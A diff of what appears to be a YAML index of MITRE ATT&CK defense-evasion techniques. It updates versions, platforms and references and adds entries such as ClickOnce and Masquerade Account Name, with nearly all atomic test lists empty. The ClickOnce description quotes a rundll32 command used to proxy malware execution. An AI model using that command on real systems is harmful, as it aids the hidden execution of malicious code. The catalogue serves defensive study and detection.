       x_mitre_system_requirements:
       - MS Office version specified in <code>_VBA_PROJECT</code> stream must match
         host
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1197:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:21:40.927Z'
       name: BITS Jobs
       description: |-
         Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
@@ -11228,7 +11364,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1197
     atomic_tests: []
   T1127.001:
@@ -11286,12 +11421,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1127.001
     atomic_tests: []
   T1656:
     technique:
-      modified: '2023-09-30T19:45:05.886Z'
+      modified: '2024-10-15T15:59:06.382Z'
       name: Impersonation
       description: "Adversaries may impersonate a trusted person or organization in
         order to persuade and trick a target into performing some action on their
@@ -11333,10 +11467,9 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       type: attack-pattern
@@ -11360,18 +11493,30 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1578.005:
     technique:
-      modified: '2023-10-02T22:17:54.968Z'
+      modified: '2024-09-25T14:15:26.322Z'
       name: Modify Cloud Compute Configurations
-      description: |-
-        Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses. These settings may include service quotas, subscription associations, tenant-wide policies, or other configurations that impact available compute. Such modifications may allow adversaries to abuse the victim’s compute resources to achieve their goals, potentially without affecting the execution of running instances and/or revealing their activities to the victim.
-
-        For example, cloud providers often limit customer usage of compute resources via quotas. Customers may request adjustments to these quotas to support increased computing needs, though these adjustments may require approval from the cloud provider. Adversaries who compromise a cloud environment may similarly request quota adjustments in order to support their activities, such as enabling additional [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking 2023) Adversaries may also increase allowed resource usage by modifying any tenant-wide policies that limit the sizes of deployed virtual machines.(Citation: Microsoft Azure Policy)
-
-        Adversaries may also modify settings that affect where cloud resources can be deployed, such as enabling [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535). In Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources, or engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant.(Citation: Microsoft Peach Sandstorm 2023) This will allow the adversary to use the victim’s compute resources without generating logs on the victim tenant.(Citation: Microsoft Azure Policy) (Citation: Microsoft Subscription Hijacking 2022)
+      description: "Adversaries may modify settings that directly affect the size,
+        locations, and resources available to cloud compute infrastructure in order
+        to evade defenses. These settings may include service quotas, subscription
+        associations, tenant-wide policies, or other configurations that impact available
+        compute. Such modifications may allow adversaries to abuse the victim’s compute
+        resources to achieve their goals, potentially without affecting the execution
+        of running instances and/or revealing their activities to the victim.\n\nFor
+        example, cloud providers often limit customer usage of compute resources via
+        quotas. Customers may request adjustments to these quotas to support increased
+        computing needs, though these adjustments may require approval from the cloud
+        provider. Adversaries who compromise a cloud environment may similarly request
+        quota adjustments in order to support their activities, such as enabling additional
+        [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising
+        suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking
+        2023) Adversaries may also increase allowed resource usage by modifying any
+        tenant-wide policies that limit the sizes of deployed virtual machines.(Citation:
+        Microsoft Azure Policy)\n\nAdversaries may also modify settings that affect
+        where cloud resources can be deployed, such as enabling [Unused/Unsupported
+        Cloud Regions](https://attack.mitre.org/techniques/T1535). "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -11385,7 +11530,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      x_mitre_version: '1.0'
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Modification'
       type: attack-pattern
@@ -11397,20 +11542,11 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1578/005
         external_id: T1578.005
-      - source_name: Microsoft Subscription Hijacking 2022
-        description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
-          using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
-        url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
       - source_name: Microsoft Cryptojacking 2023
         description: 'Microsoft Threat Intelligence. (2023, July 25). Cryptojacking:
           Understanding and defending against cloud compute resource abuse. Retrieved
           September 5, 2023.'
         url: https://www.microsoft.com/en-us/security/blog/2023/07/25/cryptojacking-understanding-and-defending-against-cloud-compute-resource-abuse/
-      - source_name: Microsoft Peach Sandstorm 2023
-        description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
-          password spray campaigns enable intelligence collection at high-value targets.
-          Retrieved September 18, 2023.
-        url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
       - source_name: Microsoft Azure Policy
         description: Microsoft. (2023, August 30). Azure Policy built-in policy definitions.
           Retrieved September 5, 2023.
@@ -11419,11 +11555,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.008:
     technique:
-      modified: '2024-04-12T21:13:56.431Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Impair Defenses: Disable Cloud Logs'
       description: |-
         An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.
@@ -11432,6 +11567,7 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -11441,6 +11577,7 @@ defense-evasion:
       - Janantha Marasinghe
       - Matt Snyder, VMware
       - Joe Gumke, U.S. Bank
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor logs for API calls to disable logging. In AWS, monitor
         for: <code>StopLogging</code> and <code>DeleteTrail</code>.(Citation: Stopping
@@ -11452,13 +11589,13 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
       - SaaS
-      - Google Workspace
-      - Azure AD
-      - Office 365
-      x_mitre_version: '2.0'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Modification'
       - 'User Account: User Account Modification'
@@ -11503,9 +11640,6 @@ defense-evasion:
         url: https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/detection__disruption/main.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.008
     atomic_tests:
     - name: Azure - Eventhub Deletion
@@ -11668,18 +11802,140 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.003
     atomic_tests: []
+  T1127.002:
+    technique:
+      modified: '2024-10-17T18:50:41.474Z'
+      name: ClickOnce
+      description: |-
+        Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility.(Citation: Burke/CISA ClickOnce BlackHat) ClickOnce is a deployment that enables a user to create self-updating Windows-based .NET applications (i.e, .XBAP, .EXE, or .DLL) that install and run from a file share or web page with minimal user interaction. The application launches as a child process of DFSVC.EXE, which is responsible for installing, launching, and updating the application.(Citation: SpectorOps Medium ClickOnce)
+
+        Because ClickOnce applications receive only limited permissions, they do not require administrative permissions to install.(Citation: Microsoft Learn ClickOnce) As such, adversaries may abuse ClickOnce to proxy execution of malicious code without needing to escalate privileges.
+
+        ClickOnce may be abused in a number of ways. For example, an adversary may rely on [User Execution](https://attack.mitre.org/techniques/T1204). When a user visits a malicious website, the .NET malware is disguised as legitimate software and a ClickOnce popup is displayed for installation.(Citation: NetSPI ClickOnce)
+
+        Adversaries may also abuse ClickOnce to execute malware via a [Rundll32](https://attack.mitre.org/techniques/T1218/011) script using the command `rundll32.exe dfshim.dll,ShOpenVerbApplication1`.(Citation: LOLBAS /Dfsvc.exe)
+
+        Additionally, an adversary can move the ClickOnce application file to a remote user’s startup folder for continued malicious code deployment (i.e., [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001)).(Citation: Burke/CISA ClickOnce BlackHat)(Citation: Burke/CISA ClickOnce Paper)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Wirapong Petshagun
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Command: Command Execution'
+      - 'Process: Process Metadata'
+      - 'Module: Module Load'
+      x_mitre_system_requirements:
+      - ".NET Framework"
+      type: attack-pattern
+      id: attack-pattern--cc279e50-df85-4c8e-be80-6dc2eda8849c
+      created: '2024-09-09T14:39:28.637Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1127/002
+        external_id: T1127.002
+      - source_name: LOLBAS /Dfsvc.exe
+        description: LOLBAS. (n.d.). /Dfsvc.exe. Retrieved September 9, 2024.
+        url: https://lolbas-project.github.io/lolbas/Binaries/Dfsvc/
+      - source_name: Microsoft Learn ClickOnce
+        description: Microsoft. (2023, September 14). ClickOnce security and deployment.
+          Retrieved September 9, 2024.
+        url: https://learn.microsoft.com/en-us/visualstudio/deployment/clickonce-security-and-deployment?view=vs-2022
+      - source_name: SpectorOps Medium ClickOnce
+        description: 'Nick Powers. (2023, June 7). Less SmartScreen More Caffeine:
+          (Ab)Using ClickOnce for Trusted Code Execution. Retrieved September 9, 2024.'
+        url: https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5
+      - source_name: NetSPI ClickOnce
+        description: Ryan Gandrud. (2015, March 23). All You Need Is One – A ClickOnce
+          Love Story. Retrieved September 9, 2024.
+        url: https://www.netspi.com/blog/technical-blog/adversary-simulation/all-you-need-is-one-a-clickonce-love-story/
+      - source_name: Burke/CISA ClickOnce Paper
+        description: William J. Burke IV. (n.d.). Appref-ms Abuse for  Code Execution
+          & C2. Retrieved September 9, 2024.
+        url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended-wp.pdf?_gl=1*1jv89bf*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.256219723.1512103758.1724809895-1999078900.1724809894
+      - source_name: Burke/CISA ClickOnce BlackHat
+        description: 'William Joseph Burke III. (2019, August 7). CLICKONCE AND YOU’RE
+          IN: When .appref-ms abuse is operating as intended. Retrieved September
+          9, 2024.'
+        url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended.pdf?_gl=1*16njas6*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.253743689.1512103758.1724809895-1999078900.1724809894
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1070.010:
+    technique:
+      modified: '2024-10-13T15:48:46.391Z'
+      name: Relocate Malware
+      description: |-
+        Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid defenses. Copying malware payloads to new locations may also be combined with [File Deletion](https://attack.mitre.org/techniques/T1070/004) to cleanup older artifacts.
+
+        Relocating malware may be a part of many actions intended to evade defenses. For example, adversaries may copy and rename payloads to better blend into the local environment (i.e., [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: DFIR Report Trickbot June 2023) Payloads may also be repositioned to target [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012) as well as specific locations associated with establishing [Persistence](https://attack.mitre.org/tactics/TA0003).(Citation: Latrodectus APR 2024)
+
+        Relocating malicious payloads may also hinder defensive analysis, especially to separate these payloads from earlier events (such as [User Execution](https://attack.mitre.org/techniques/T1204) and [Phishing](https://attack.mitre.org/techniques/T1566)) that may have generated alerts or otherwise drawn attention from defenders.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Matt Anderson, @‌nosecurething, Huntress
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'File: File Modification'
+      type: attack-pattern
+      id: attack-pattern--cc36eeae-2209-4e63-89d3-c97e19edf280
+      created: '2024-05-31T11:07:57.406Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1070/010
+        external_id: T1070.010
+      - source_name: Latrodectus APR 2024
+        description: 'Proofpoint Threat Research and Team Cymru S2 Threat Research.
+          (2024, April 4). Latrodectus: This Spider Bytes Like Ice . Retrieved May
+          31, 2024.'
+        url: https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice
+      - source_name: DFIR Report Trickbot June 2023
+        description: The DFIR Report. (2023, June 12). A Truly Graceful Wipe Out.
+          Retrieved May 31, 2024.
+        url: https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1556.009:
     technique:
-      modified: '2024-04-18T20:53:46.175Z'
+      modified: '2024-09-16T16:54:47.595Z'
       name: Conditional Access Policies
       description: "Adversaries may disable or modify conditional access policies
         to enable persistent access to compromised accounts. Conditional access policies
         are additional verifications used by identity providers and identity and access
         management systems to determine whether a user should be granted access to
-        a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+        a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
         denied access to applications based on their IP address, device enrollment
         status, and use of multi-factor authentication.(Citation: Microsoft Conditional
         Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -11712,10 +11968,9 @@ defense-evasion:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - SaaS
       - IaaS
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Cloud Service: Cloud Service Modification'
@@ -11752,40 +12007,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1578.002:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
-      type: attack-pattern
-      created: '2020-05-14T14:45:15.978Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1578.002
-        url: https://attack.mitre.org/techniques/T1578/002
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: AWS CloudTrail Search
-        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
-        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
-          Retrieved June 17, 2020.
-      - source_name: Azure Activity Logs
-        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
-        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
-          2020.
-      - source_name: Cloud Audit Logs
-        url: https://cloud.google.com/logging/docs/audit#admin-activity
-        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-30T13:28:37.416Z'
       name: Create Cloud Instance
       description: |-
         An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)
@@ -11794,20 +12019,50 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.
 
         In AWS, CloudTrail logs capture the creation of an instance in the <code>RunInstances</code> event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of <code>gcloud compute instances create</code> to create a VM.(Citation: Cloud Audit Logs)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Instance: Instance Creation'
       - 'Instance: Instance Metadata'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
+      created: '2020-05-14T14:45:15.978Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1578/002
+        external_id: T1578.002
+      - source_name: AWS CloudTrail Search
+        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+          Retrieved June 17, 2020.
+        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+      - source_name: Cloud Audit Logs
+        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+        url: https://cloud.google.com/logging/docs/audit#admin-activity
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: Azure Activity Logs
+        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+          2020.
+        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.009:
     technique:
@@ -11837,7 +12092,7 @@ defense-evasion:
         url: http://man7.org/linux/man-pages/man1/dd.1.html
         description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
           February 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-06-20T22:25:55.331Z'
       name: Proc Memory
       description: "Adversaries may inject malicious code into processes via the /proc
         filesystem in order to evade process-based defenses as well as possibly elevate
@@ -11880,8 +12135,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1601.001:
     technique:
@@ -11928,7 +12181,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T17:50:46.560Z'
       name: Patch System Image
       description: "Adversaries may modify the operating system of a network device
         to introduce new capabilities or weaken existing defenses.(Citation: Killing
@@ -11994,12 +12247,10 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1070.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T22:30:01.227Z'
       name: Clear Persistence
       description: |-
         Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://attack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco Attack 2022)
@@ -12054,33 +12305,84 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
-  T1556.001:
+  T1036.010:
     technique:
-      x_mitre_platforms:
-      - Windows
+      modified: '2024-10-17T15:20:36.705Z'
+      name: Masquerade Account Name
+      description: "Adversaries may match or approximate the names of legitimate accounts
+        to make newly created ones appear benign. This will typically occur during
+        [Create Account](https://attack.mitre.org/techniques/T1136), although accounts
+        may also be renamed at a later date. This may also coincide with [Account
+        Access Removal](https://attack.mitre.org/techniques/T1531) if the actor first
+        deletes an account before re-creating one with the same name.(Citation: Huntress
+        MOVEit 2023)\n\nOften, adversaries will attempt to masquerade as service accounts,
+        such as those associated with legitimate software, data backups, or container
+        cluster management.(Citation: Elastic CUBA Ransomware 2022)(Citation: Aquasec
+        Kubernetes Attack 2023) They may also give accounts generic, trustworthy names,
+        such as “admin”, “help”, or “root.”(Citation: Invictus IR Cloud Ransomware
+        2024) Sometimes adversaries may model account names off of those already existing
+        in the system, as a follow-on behavior to [Account Discovery](https://attack.mitre.org/techniques/T1087).
+        \ \n\nNote that this is distinct from [Impersonation](https://attack.mitre.org/techniques/T1656),
+        which describes impersonating specific trusted individuals or organizations,
+        rather than user or service account names.  "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Menachem Goldstein
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      - SaaS
+      - IaaS
+      - Containers
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'User Account: User Account Creation'
       type: attack-pattern
-      created: '2020-02-11T19:05:02.399Z'
+      id: attack-pattern--d349c66e-18e1-4d8b-a2d7-65af7cbd2ba0
+      created: '2024-08-05T21:39:16.274Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1556.001
-        url: https://attack.mitre.org/techniques/T1556/001
-      - source_name: Dell Skeleton
-        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
-          Retrieved April 8, 2019.
-        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
-      - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
-        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
-          June 3, 2016.
-        source_name: TechNet Audit Policy
-      modified: '2022-04-25T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1036/010
+        external_id: T1036.010
+      - source_name: Elastic CUBA Ransomware 2022
+        description: Daniel Stepanic, Derek Ditch, Seth Goodwin, Salim Bitam, Andrew
+          Pease. (2022, September 7). CUBA Ransomware Campaign Analysis. Retrieved
+          August 5, 2024.
+        url: https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis
+      - source_name: Invictus IR Cloud Ransomware 2024
+        description: Invictus IR. (2024, January 11). Ransomware in the cloud. Retrieved
+          August 5, 2024.
+        url: https://www.invictus-ir.com/news/ransomware-in-the-cloud
+      - source_name: Huntress MOVEit 2023
+        description: John Hammond. (2023, June 1). MOVEit Transfer Critical Vulnerability
+          CVE-2023-34362 Rapid Response. Retrieved August 5, 2024.
+        url: https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response
+      - source_name: Aquasec Kubernetes Attack 2023
+        description: Michael Katchinskiy, Assaf Morag. (2023, April 21). First-Ever
+          Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved July 14,
+          2023.
+        url: https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1556.001:
+    technique:
+      modified: '2024-08-21T15:26:54.386Z'
       name: Domain Controller Authentication
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
@@ -12101,6 +12403,7 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for calls to <code>OpenProcess</code> that can be
         used to manipulate lsass.exe running on a domain controller as well as for
         malicious modifications to functions exported from authentication-related
@@ -12115,22 +12418,42 @@ defense-evasion:
         used to execute binaries on a remote system as a particular account. Correlate
         other security systems with login information (e.g. a user has an active login
         session but has not entered the building or does not have VPN access). "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
